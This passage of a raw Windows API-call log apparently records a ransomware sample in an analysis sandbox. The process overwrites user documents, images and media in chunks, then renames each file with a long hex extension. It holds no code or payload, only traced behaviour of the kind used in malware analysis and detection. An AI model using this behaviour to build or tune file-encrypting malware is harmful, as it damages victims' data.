lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf.D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf.D11C2449620F7B201A0FB3E5C61679CA38839E198179EA32B42989EBF5C11934" [0164.444] GetProcessHeap () returned 0x270000 [0164.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x425d198 [0164.444] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x73dfc44, FileInformation=0x425d198, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0164.450] CloseHandle (hObject=0x5a8) returned 1 [0164.455] GetProcessHeap () returned 0x270000 [0164.456] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x7640300 | out: hHeap=0x270000) returned 1 [0164.694] RtlInterlockedCompareExchange64 () returned 0x4 [0164.694] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.673] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.675] RtlInterlockedCompareExchange64 () returned 0x0 [0165.675] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.690] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.692] RtlInterlockedCompareExchange64 () returned 0x0 [0165.692] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.701] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.703] RtlInterlockedCompareExchange64 () returned 0x0 [0165.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.712] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.713] RtlInterlockedCompareExchange64 () returned 0x0 [0165.713] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.782] WriteFile (in: hFile=0x5e4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.974] RtlInterlockedCompareExchange64 () returned 0x1 [0165.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0165.990] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0165.997] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg", lpString2=".2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg.2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\6 
IQKF_vkJtPe8lb.jpg.2CD2F3BA569A7D6B64C8EDE119AC630114E97D8B190323AF3057A63773AFEE4B" [0165.997] GetProcessHeap () returned 0x270000 [0165.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42770b8 [0165.997] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x42770b8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.999] CloseHandle (hObject=0x598) returned 1 [0165.999] GetProcessHeap () returned 0x270000 [0166.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0166.004] RtlInterlockedCompareExchange64 () returned 0x2 [0166.004] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.016] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.017] RtlInterlockedCompareExchange64 () returned 0x0 [0166.017] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.037] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.038] RtlInterlockedCompareExchange64 () returned 0x0 [0166.038] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.050] WriteFile (in: hFile=0x5b0, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.051] RtlInterlockedCompareExchange64 () returned 0x0 [0166.051] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.069] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.071] RtlInterlockedCompareExchange64 () returned 0x0 [0166.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.090] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.091] RtlInterlockedCompareExchange64 () returned 0x0 [0166.091] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.102] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.103] RtlInterlockedCompareExchange64 () returned 0x0 [0166.103] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.115] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.116] RtlInterlockedCompareExchange64 () returned 0x0 [0166.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.128] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.130] RtlInterlockedCompareExchange64 () returned 0x0 [0166.130] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.145] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.146] RtlInterlockedCompareExchange64 () returned 0x0 [0166.146] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, 
lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.162] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.163] RtlInterlockedCompareExchange64 () returned 0x0 [0166.163] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.178] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.179] RtlInterlockedCompareExchange64 () returned 0x0 [0166.179] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.197] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.198] RtlInterlockedCompareExchange64 () returned 0x0 [0166.198] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.210] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.211] RtlInterlockedCompareExchange64 () returned 0x0 [0166.211] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.220] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.221] RtlInterlockedCompareExchange64 () returned 0x0 [0166.221] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.229] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.230] RtlInterlockedCompareExchange64 () returned 0x0 [0166.230] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.241] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.242] RtlInterlockedCompareExchange64 () returned 0x0 [0166.242] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.255] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.256] RtlInterlockedCompareExchange64 () returned 0x0 [0166.256] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.267] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.268] RtlInterlockedCompareExchange64 () returned 0x0 [0166.268] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.283] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.285] RtlInterlockedCompareExchange64 () returned 0x0 [0166.285] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.405] WriteFile (in: hFile=0x5ac, 
lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.406] RtlInterlockedCompareExchange64 () returned 0x0 [0166.406] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.417] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.419] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc", lpString2=".3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc.3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc.3823B3E57BCF47FA408BC5AEF26F1455D63526497AFFBBEF6D9404FA29DD5111" [0166.419] GetProcessHeap () returned 0x270000 [0166.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741ccc8 [0166.419] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741ccc8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0166.420] CloseHandle (hObject=0x5ac) returned 1 [0166.425] GetProcessHeap () returned 0x270000 [0166.426] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.426] RtlInterlockedCompareExchange64 () returned 0x1 [0166.426] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.429] ReadFile (in: hFile=0x5ac, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.429] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.431] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0166.432] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp", lpString2=".8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp.8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp.8F0C262A9912EECB9B0C1093B5A604ED916072BFD4CA77C90D88531CBF807164" [0166.432] GetProcessHeap () returned 0x270000 [0166.432] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741ce00 [0166.432] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x741ce00, Length=0x124, FileInformationClass=0xa) returned 0x0 [0166.434] CloseHandle (hObject=0x5ac) returned 1 [0166.435] GetProcessHeap () returned 0x270000 [0166.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.440] RtlInterlockedCompareExchange64 () returned 0x1 [0166.440] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.457] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.458] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.459] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.461] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv", lpString2=".081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv.081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv.081941A845B3D5A44227168477266FDBD0486E276A1A3C846F78F2608F6E951C" [0166.461] GetProcessHeap () returned 0x270000 [0166.461] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f8758 [0166.461] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8758, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.462] CloseHandle (hObject=0x5ac) returned 1 [0166.464] GetProcessHeap () returned 0x270000 [0166.465] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.465] 
RtlInterlockedCompareExchange64 () returned 0x1 [0166.465] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.469] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.470] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0166.472] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0166.473] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav", lpString2=".20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav.20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav.20030B56687E20F17E2B73BD7D6B08036161DD1D072142CB1AAFB9309BE5E15A" [0166.473] GetProcessHeap () returned 0x270000 [0166.473] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f8880 [0166.474] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x73dfc44, FileInformation=0x42f8880, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0166.476] CloseHandle (hObject=0x5ac) returned 1 [0166.477] GetProcessHeap () returned 0x270000 [0166.479] HeapFree (in: 
